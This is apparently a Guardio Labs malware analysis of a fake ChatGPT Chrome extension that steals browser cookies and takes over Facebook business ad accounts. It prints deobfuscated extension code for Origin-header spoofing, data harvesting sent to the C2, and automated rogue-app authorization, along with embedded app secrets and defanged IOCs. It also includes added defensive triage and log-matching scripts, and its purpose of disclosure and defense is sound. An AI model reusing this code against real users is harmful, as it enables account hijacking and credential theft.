Submitted URL: https://labs.guard.io/fakegpt-new-variant-of-fake-chatgpt-chrome-extension-stealing-facebook-ad-accounts-with-4c9996a8...
“FAKEGPT”: NEW VARIANT OF FAKE-CHATGPT CHROME EXTENSION STEALING FACEBOOK AD
ACCOUNTS WITH THOUSANDS OF DAILY INSTALLS

Guardio · 9 min read · Mar 8, 2023

By Nati Tal (Guardio Labs)

> A Chrome extension offering quick access to fake ChatGPT functionality was
> found to be hijacking Facebook accounts and installing hidden account
> backdoors. Particularly notable is its use of a malicious Facebook application,
> silently and forcibly added to the victim's account as a "backdoor", that
> gives the threat actors super-admin permissions.
> 
> By hijacking high-profile Facebook business accounts, the threat actor builds
> an elite army of Facebook bots and a malicious paid-media apparatus. This
> lets it push Facebook paid ads at its victims' expense, in a self-propagating,
> worm-like manner.
> 
> In this write-up, we uncover the techniques used by this powerful stealer,
> which started propagating on Facebook and the official Google Chrome Web Store
> early this month with thousands of new installations per day, and which has
> yet to be detected by either Facebook or Google.

Update: March 22, 2023 — Guardio Labs discovered another variant in this FakeGPT
campaign, abusing open-source code and yet again hijacking Facebook profiles —
read about it here.

Update: March 9, 2023 — Following Guardio’s report regarding this malicious
extension to Google, the extension is now removed from Chrome’s store.


THE VICIOUS CIRCLE OF HIJACKED FACEBOOK MALVERTISING

Our security research team at Guardio constantly monitors the abuse of
ChatGPT's brand, with endless campaigns propagating malware and phishing for
credit cards. On March 3, 2023, our team detected a new variant of a malicious
fake ChatGPT browser extension, part of a campaign that started in early
February with several other ChatGPT-branded malicious extensions. This variant
is upgraded with a technique for taking over your Facebook accounts, as well as
a sophisticated worm-like approach to propagation.


Malicious Sponsored Posts on Facebook leading to the Malicious “FakeGPT”
extension

The malicious stealer extension, titled "Quick access to Chat GPT", is promoted
in Facebook sponsored posts as a quick way to use ChatGPT directly from your
browser. Although the extension does deliver that (by simply connecting to the
official ChatGPT API), it also harvests all the information it can reach in
your browser, steals the cookies of every active authenticated session you have
with any service, and employs tailored tactics to take over your Facebook
account.


From malvertising, extension installation, hijacking Facebook accounts, and back
again to propagation

Once the threat actor has your stolen data, it will most likely sell it to the
highest bidder, as usual. Yet as we dug deeper into this operation, we noticed
the extra care it takes with high-profile Facebook business accounts. With this
approach the campaign keeps propagating using its very own army of hijacked
Facebook bot accounts, publishing more sponsored posts and other social
activity on behalf of its victims' profiles, and spending the business
accounts' ad credits to do so.

Behind the high-level campaign description above are some sophisticated
techniques for harvesting victims' details and taking over Facebook accounts.
They abuse online services and powerful APIs from both Google and Facebook,
giving the threat actors some very effective tools.


ABUSING VICTIM BROWSER’S CONTEXT

Once the extension is installed, it gives you what was advertised: a small popup
window that appears when you click the extension icon, with a prompt for asking
ChatGPT whatever you want.

Yet this is exactly where it starts to get fishy. The extension is now an
integral part of your browser, so it can send a request to any other service
as if the browser's owner had initiated it, from the same context. This is
crucial, because the browser in most cases already holds an active,
authenticated session with almost all of your day-to-day services, Facebook
included.

More specifically, this lets the extension reach Meta's Graph API for
developers, allowing the threat actor to quickly pull all your details and take
actions on your behalf directly in your Facebook account using simple API
calls.


The “Quick Access” extension sends API calls from the authenticated browser
context

There are of course limitations and security measures on Facebook's side, e.g.
verifying that requests originate from an authenticated user and from the
expected origin. The extension already rides on an authenticated Facebook
session, but what about the origin of the requests it sends? A request issued
from an extension context carries the extension's own origin
(chrome-extension://<id>) rather than facebook.com, and Facebook's endpoints
reject it. Thanks to Chrome's declarativeNetRequest API, the extension has a
simple way around that check.

The following piece of code runs in the malicious extension right at
initialisation. It registers a dynamic rule so that every XHR/fetch request to
facebook.com from any source in your browser (the extension itself included)
has its Origin header rewritten to "https://www.facebook.com". The condition
limits the rule to the "xmlhttprequest" resource type, which is exactly the
kind of request the extension makes. This gives the extension the ability to
freely browse any Facebook page, make API calls and perform actions using your
infected browser, without anything visible to you.

// Runs once at extension start-up, inside an __awaiter generator (hence the
// `yield`). `d` holds the target domain received from the C2 (facebook.com).
// removeRuleIds is applied before addRules, so rule 1 is replaced on every
// start rather than duplicated.
yield chrome.declarativeNetRequest.updateDynamicRules({
    addRules: [{
        "id": 1,
        "priority": 1,
        "action": {
            type: 'modifyHeaders',
            requestHeaders: [
                // Every XHR/fetch to www.<d> now carries Origin: https://www.<d>,
                // including the extension's own Graph API calls.
                { header: 'origin', operation: 'set', value: `https://www.${d}` }
            ],
        },
        "condition": { "urlFilter": `www.${d}`, "resourceTypes": ["xmlhttprequest"] }
    }],
    removeRuleIds: [1]
});

Note that the variable d holds the target domain (facebook.com in this case),
as sent back to the extension by the C2 server at
api2[.]openai-service[.]workers[.]dev
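The header-rewrite pattern above is something a defender can look for statically. What follows is an added example, not code from the write-up or from the extension: it triages an extension's manifest.json together with its declarativeNetRequest rule set, flags any rule that writes a request header a site relies on for origin checks (Origin, Referer, Cookie, Sec-Fetch-Site), and flags the permission combination the technique needs. The manifest is constructed for illustration (the real extension's permissions are not listed on the page); the rule is the one from the write-up with d bound to facebook.com.

```javascript
// Added example (not from the Guardio write-up): static triage of a Chrome
// extension's manifest and its declarativeNetRequest rules, flagging the
// header-rewrite trick described above. The manifest below is constructed
// for illustration; the rule is the one from the write-up with d = facebook.com.

// Request headers that, once rewritable, let an extension's own fetch/XHR
// traffic pass a site's origin or CSRF checks.
const SPOOFABLE_HEADERS = new Set(['origin', 'referer', 'cookie', 'sec-fetch-site']);

// One finding per rule that sets/appends a spoofable request header.
// `rules` uses the chrome.declarativeNetRequest.Rule shape.
function findHeaderSpoofRules(rules) {
  const findings = [];
  for (const rule of rules) {
    if (!rule.action || rule.action.type !== 'modifyHeaders') continue;
    for (const h of rule.action.requestHeaders || []) {
      const name = String(h.header).toLowerCase();
      const writes = h.operation === 'set' || h.operation === 'append';
      if (writes && SPOOFABLE_HEADERS.has(name)) {
        findings.push({
          ruleId: rule.id,
          header: name,
          value: h.value,
          urlFilter: (rule.condition && rule.condition.urlFilter) || '*',
          resourceTypes: (rule.condition && rule.condition.resourceTypes) || ['*'],
        });
      }
    }
  }
  return findings;
}

// Permission combination that makes the technique work end to end:
// rewriting headers, reading every cookie, and reaching every host.
function triageManifest(manifest) {
  const perms = new Set([...(manifest.permissions || []),
                         ...(manifest.optional_permissions || [])]);
  const hosts = manifest.host_permissions || [];
  const reasons = [];
  if (perms.has('declarativeNetRequest') || perms.has('declarativeNetRequestWithHostAccess')) {
    reasons.push('can rewrite request headers (declarativeNetRequest)');
  }
  if (perms.has('cookies')) reasons.push('can read every cookie (cookies permission)');
  if (hosts.some((h) => h === '<all_urls>' || /^\*:\/\/\*\//.test(h))) {
    reasons.push('host access to all sites');
  }
  return { name: manifest.name, reasons, suspicious: reasons.length >= 2 };
}

function triageExtension(manifest, rules) {
  const m = triageManifest(manifest);
  const spoof = findHeaderSpoofRules(rules);
  return { ...m, headerSpoofRules: spoof, suspicious: m.suspicious || spoof.length > 0 };
}

// Constructed sample manifest (hypothetical permissions) and the dynamic
// rule shown in the write-up.
const SAMPLE_MANIFEST = {
  name: 'Quick access to Chat GPT (constructed sample)',
  manifest_version: 3,
  permissions: ['declarativeNetRequest', 'cookies', 'storage'],
  host_permissions: ['<all_urls>'],
};
const d = 'facebook.com';
const SAMPLE_RULES = [{
  id: 1, priority: 1,
  action: { type: 'modifyHeaders',
            requestHeaders: [{ header: 'origin', operation: 'set', value: `https://www.${d}` }] },
  condition: { urlFilter: `www.${d}`, resourceTypes: ['xmlhttprequest'] },
}];

const report = triageExtension(SAMPLE_MANIFEST, SAMPLE_RULES);
console.log(JSON.stringify(report, null, 2));
```

Static rules live under the manifest's declarative_net_request.rule_resources files, while dynamic rules (the kind used here) are added at runtime and persist in the profile, so both sources need to be fed to findHeaderSpoofRules when auditing an installed extension.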


HARVESTING DATA AND SENDING IT BACK TO C2 SERVERS

Now, once the victim opens the extension window and types a question for
ChatGPT, the query is sent to OpenAI's servers to keep the victim busy, while
in the background the harvest is triggered immediately.

Following are some examples of deobfuscated code from the malicious extension's
source. It was written in TypeScript and packed/minified, yet using the .map
(source map) files shipped inside the package we managed to reassemble the code
into a readable form, with function and variable names that turned out to be
truly informative and make the real intent of this code obvious at first sight:

// index.ts
// Entry point: collect the Facebook token, the victim's public IP and a
// second token in parallel, then start the ad-account harvest.
start() {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            yield Promise.all([
                this.getToken(),
                this.getClientIP(),
                this.getTokenEQ()
            ]);
            yield this.fetchAds();
        }
        catch (error) {}
        finally {}
    });
}

// ads.ts
// Harvest ad accounts, pages and Business Manager data, ship them to the C2,
// and, for "big" accounts only, hand over to the Potal takeover module.
run() {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            yield Promise.all([
                this.getListAds(),
                this.getListPages(),
                this.getListBM(),
                this.SendToServer()
            ]);
            if (this.is_big) {
                new portal_1.Potal(this.fb_dtsg, this.uid).run();
            }
        }
        catch (error) {}
    });
}

The above are the main functions; they execute a series of queries against
Facebook's Graph API as well as other Chrome APIs, such as reading all of your
cookies. A noteworthy example from the code:

// ads.ts
// index_1.VLKSF_DOM = 'facebook.com'

// Pull every financially relevant field of one ad account in a single
// Graph API call (the long `fields` list is split here for readability).
getInfoAdAccountGraph(account_id) {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            const url = `https://graph.${index_1.VLKSF_DOM}/v14.0/act_${account_id}?method=get&date_format=U&`
                + `fields=amount_spent,insights.date_preset(data_maximum)%7Bspend%7D,account_id,funding_source_details,adspaymentcycle%7Bthreshold_amount%7D,`
                + `name,created_time,last_used_time,currency,timezone_name,stored_balance_status,business,balance,adtrust_dsl,spend_cap,disable_reason,`
                + `is_prepay_account,total_prepay_balance.fields(amount),max_billing_threshold.fields(amount),min_billing_threshold.fields(amount),`
                + `am_tabular.date_preset(data_maximum).column_fields(spend),owner,agencies.fields(id,role,name),users.fields(id,role,name),has_extended_credit`
                + `&access_token=${this.token}`;
            const options = {
                url
            };
            let data = yield this._request(options);
[...]

The above Graph API call gives the attackers everything they need to know about
your Facebook business account (if you have one), including your currently
active promotions and credit balance. The extension then examines all the
harvested data, prepares it, and sends it back to the C2 server using the
following API calls, each according to the type of data it carries:

api2[.]openai-service[.]workers[.]dev/api/add-data-account
api2[.]openai-service[.]workers[.]dev/api/add-business-manager
api2[.]openai-service[.]workers[.]dev/api/add-pages
api2[.]openai-service[.]workers[.]dev/api/add-ads-manager
api2[.]openai-service[.]workers[.]dev/api/update-data-login-account

Each call includes a detailed JSON formatted payload with ALL that they need,
including session cookies, money balance, and whatnot. Just a quick example of
the basic data being exfiltrated:


Example of out-going data from the extension to C2 on API call
“add-data-account”

Example of out-going data from the extension to C2 on API call “add-ads-manager”

In the first example the full list of cookies was trimmed for display; in
reality it contains ALL the cookies stored in your browser, including security
and session tokens for services such as YouTube, Google accounts, Twitter, and
so on. In the second example, once the extension finds that you have a business
page, it collects your Facebook account details, your complete current ads
configuration, and the financial data seen above.
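The exfiltration goes to fixed hostnames and paths, so egress logs are a reliable place to find infected machines. The following is an added example, not part of the original write-up: it takes the C2 indicators published above (kept defanged, exactly as listed, and refanged at load time), matches URLs by host and path prefix, and runs over a few proxy log lines. The log format and the lines themselves are constructed for the example.

```javascript
// Added example, not part of the original write-up: matching egress/proxy
// logs against the C2 endpoints and the IP-check service listed in the post.
// Indicators are kept defanged as published and refanged at load time; the
// log lines and their format are constructed for the example.

const RAW_IOCS = [
  ['c2', 'api2[.]openai-service[.]workers[.]dev/api/add-data-account'],
  ['c2', 'api2[.]openai-service[.]workers[.]dev/api/add-business-manager'],
  ['c2', 'api2[.]openai-service[.]workers[.]dev/api/add-pages'],
  ['c2', 'api2[.]openai-service[.]workers[.]dev/api/add-ads-manager'],
  ['c2', 'api2[.]openai-service[.]workers[.]dev/api/update-data-login-account'],
  // Host-only entries last, so a path-specific indicator is reported first.
  ['c2', 'api2[.]openai-service[.]workers[.]dev'],
  ['c2', 'df3233[.]workers[.]dev'],
  ['c2', 'xfks[.]workers[.]dev'],
  ['ipcheck', 'lumtest[.]com/myip.json'],
];

// "[.]" -> "." and "hxxp" -> "http" are the usual defanging conventions.
function refang(ioc) {
  return ioc.replace(/\[\.\]/g, '.').replace(/hxxp/gi, 'http');
}

// Split an indicator into a lower-cased host and an optional path prefix.
function parseIoc(kind, ioc) {
  const s = refang(ioc).replace(/^https?:\/\//i, '');
  const slash = s.indexOf('/');
  return slash === -1
    ? { kind, host: s.toLowerCase(), pathPrefix: '' }
    : { kind, host: s.slice(0, slash).toLowerCase(), pathPrefix: s.slice(slash) };
}

const IOC_TABLE = RAW_IOCS.map(([kind, ioc]) => parseIoc(kind, ioc));

// Host matches exactly or as a subdomain; the path must start with the prefix.
function matchUrl(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch (e) { return null; }
  const host = u.hostname.toLowerCase();
  for (const ioc of IOC_TABLE) {
    const hostHit = host === ioc.host || host.endsWith('.' + ioc.host);
    if (hostHit && u.pathname.startsWith(ioc.pathPrefix)) return ioc;
  }
  return null;
}

// Constructed log format: "<iso-timestamp> <client-ip> <method> <url> <bytes-out>".
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const parts = line.trim().split(/\s+/);
    if (parts.length < 5) continue;
    const [ts, client, method, url, bytes] = parts;
    const ioc = matchUrl(url);
    if (ioc) {
      hits.push({ ts, client, method, url, bytesOut: Number(bytes),
                  kind: ioc.kind, ioc: ioc.host + ioc.pathPrefix });
    }
  }
  return hits;
}

// Constructed sample: one victim browser doing a real ChatGPT query, the IP
// check, two exfiltration POSTs and one stray request to the C2 host; plus
// one unrelated client.
const SAMPLE_LOG = [
  '2023-03-04T10:01:02Z 10.0.0.5 POST https://chat.openai.com/backend-api/conversation 812',
  '2023-03-04T10:01:03Z 10.0.0.5 GET https://lumtest.com/myip.json 0',
  '2023-03-04T10:01:04Z 10.0.0.5 POST https://api2.openai-service.workers.dev/api/add-data-account 48213',
  '2023-03-04T10:01:09Z 10.0.0.5 POST https://api2.openai-service.workers.dev/api/add-ads-manager 7320',
  '2023-03-04T10:01:10Z 10.0.0.5 GET https://api2.openai-service.workers.dev/robots.txt 0',
  '2023-03-04T10:02:00Z 10.0.0.7 GET https://www.facebook.com/ 0',
];

for (const hit of scanLog(SAMPLE_LOG)) console.log(hit);
```

The bytes-out column is worth keeping in the hit: a POST to add-data-account carries the full cookie jar, so its size stands out against the rest of a client's traffic and helps rank which hosts to isolate first.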


TAKING OVER ACCOUNTS WITH A ROGUE FACEBOOK APPLICATION

By now the threat actors have enough data to profit from. And yet, if they find
your account interesting enough (e.g. you have a business page with lots of
likes and an advertising plan with credits waiting to be spent), it is time to
take over and get control.

A dedicated module in the extension code (Portal.ts) contains a class named
Potal (yes, with a typo) that is responsible for this magic. Instead of trying
to harvest account passwords, or trying to bypass 2FA with session tokens
(which is not that easy given Facebook's security measures), this threat actor
chooses another route: a malicious Facebook application.

An application in Facebook's ecosystem is usually a SaaS service that has been
approved to use Facebook's special API, allowing the third-party service to
read account information and act on your behalf. We all remember those apps
spamming our feeds with promotional posts, but this threat actor takes it to
another level.

The Potal module once again abuses the ChatGPT popup context to send requests
to Facebook's servers on your behalf, this time automating the entire process
of registering an app on your account and approving it to get, basically, A
FULL ADMIN MODE.

This threat actor uses 2 main apps, as seen in the code:

// App IDs and secrets embedded in the extension ("secrect" is the original
// misspelling in the malware's code, kept as-is).
let apps = {
    "portal": {
        app_id: "1348564698517390",
        secrect: "007c0a9101b9e1c8ffab727666805038",
    },
    "msg_kig": {
        app_id: "1174099472704185",
        secrect: "0722a7d5b5a4ac06b11450f7114eb2e9",
    }
};

The first malicious Facebook app (portal) is no longer available, yet the
second one is still alive and kicking. To understand what it does, we opened
Facebook's app settings page for a real app installed on our own account and
swapped its app_id for the one used by this threat actor:

https://www[.]facebook[.]com/settings/applications/app_details/?app_id=1174099472704185 

This revealed its name, icon and, most importantly, the long (really long) list
of permissions it is granted:



This app, which for some reason is actually approved by Facebook and
functional, appears to request every permission available: from full control of
your Facebook profile and activity to admin powers over all your groups, pages,
businesses and, of course, ad accounts. It can even manage your connected
WhatsApp and Instagram accounts.

Moreover, it uses the same name and icon as an official app from Facebook:


The listing of the official Messenger Kids app by Facebook

The process of automatically adding the app to the victim's account can be seen
in the main function of the Potal module. Every function here uses, yet again,
Facebook's Graph API, with no interaction needed from the victim: from
requesting that the application be added, through authentication, to the final
confirmation. The endpoints in the IOC list (oauth/device/authorize,
device/login, device/login_status) belong to Facebook's device login, an OAuth
device-authorization flow whose only user-facing step is confirming a short
code on a page that the extension can reach with the victim's session:

run() {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            yield this.getUserCode();          // obtain the device/user code pair
            yield this.authorize();            // submit the code with the victim's session
            yield this.oauth();                // OAuth dialog for the rogue app
            if (!this.encrypted_post_body)
                return console.log("CANT GET ENCRYPT");
            yield this.comfirm();              // final confirmation, no user involved
            if (!this.confirm_code)
                return console.log("CANT GET COMFIRM CODE");
            yield this.addDevice();
            yield this.login_status();         // poll until the grant completes
            yield this.createSessionForApp();  // session for the now-authorised app
            if (this.cookies) {
                yield this.SendToServer();     // exfiltrate the resulting credentials
            }
        }
        catch (error) {
        }
    });
}

This time the exfiltrated data is encrypted before being sent home. We assume
this is because the threat actor reserves this method for truly valuable
targets, and because these accounts are what it uses to self-propagate this and
other malicious activity through Facebook promoted posts.


CONCLUSION

Not only is this malicious extension roaming free on the official Chrome Web
Store (and still live as these lines are being written), it also abuses
Facebook's official applications API in a way that should already have drawn
the attention of policy enforcers. Not to mention the false and malicious
promoted posts that Facebook approves so easily.

More than 2,000 users have been installing this extension every day since its
first appearance on March 3, 2023. Each of them has their Facebook account data
stolen, and that is probably not the only damage.

Lately we see a troubling blow to the trust we used to place blindly in the
companies and big names responsible for most of our online presence and
activity: Google still allows malvertising in its promoted search results,
YouTube cannot get rid of hijacked channels promoting crypto scams, and
Facebook allows permission-hungry fake applications that mimic Facebook's own
apps.

These activities are probably here to stay. So we must be more vigilant, even
in our day-to-day casual browsing: don't click the first search result, and
never click sponsored links and posts unless you are quite sure who is behind
them.




IOCS

Original Facebook Post and Pages:
https://www[.]facebook[.]com/chatgpt.google/videos/719341863011965/
https://www[.]facebook[.]com/chatgpt.google/

Extension IDs:
kgnddmccicfibljeodejjmekeiilkfhk (latest)
coegmjlpjblmfpcnleenkhggdebdcpho
boofekcjiojcpcehaldjhjfhcienopme

C2 Servers:
api2[.]openai-service[.]workers[.]dev
df3233[.]workers[.]dev
xfks[.]workers[.]dev

C2 API Calls:
api2[.]openai-service[.]workers[.]dev/api/add-data-account
api2[.]openai-service[.]workers[.]dev/api/add-business-manager
api2[.]openai-service[.]workers[.]dev/api/add-pages
api2[.]openai-service[.]workers[.]dev/api/add-ads-manager
api2[.]openai-service[.]workers[.]dev/api/update-data-login-account

Facebook app IDs:
1348564698517390 (portal)
1174099472704185 (Messenger Kids for iOS - active)

Facebook Graph API calls in use:
graph[.]facebook[.]com/v12.0/me/businesses?
graph[.]facebook[.]com/v12.0/me/business/adaccount/limits?
graph[.]facebook[.]com/v13.0/me/facebook_pages?
graph[.]facebook[.]com/v12.0/me/adaccounts?
graph[.]facebook[.]com/v14.0/act_{account_id}?
graph[.]facebook[.]com/ads/adbuilder
graph[.]facebook[.]com/me/?fields=id,name,birthday,email&access_token=
graph[.]facebook[.]com/v2.6/device/login_status?
graph[.]facebook[.]com/auth/create_session_for_app?
graph[.]facebook[.]com/v2.6/device/login?
graph[.]facebook[.]com/graphql
www[.]facebook[.]com/ajax/bootloader-endpoint/?modules=AdsLWIDescribeCustomersContainer.react
www[.]facebook[.]com/ajax/oauth/device.php
www[.]facebook[.]com/v2.0/dialog/oauth/confirm/
www[.]facebook[.]com/dialog/oauth
www[.]facebook[.]com/oauth/device/authorize
www[.]facebook[.]com/api/graphql/

Other:
https://lumtest[.]com/myip.json




Tags: ChatGPT, Browser Security, Facebook, Chrome Extension, Cybersecurity

WRITTEN BY GUARDIO

Keeping your online identity and information secure on every corner of the web.
#SafeBrowsing Learn more at https://guard.io
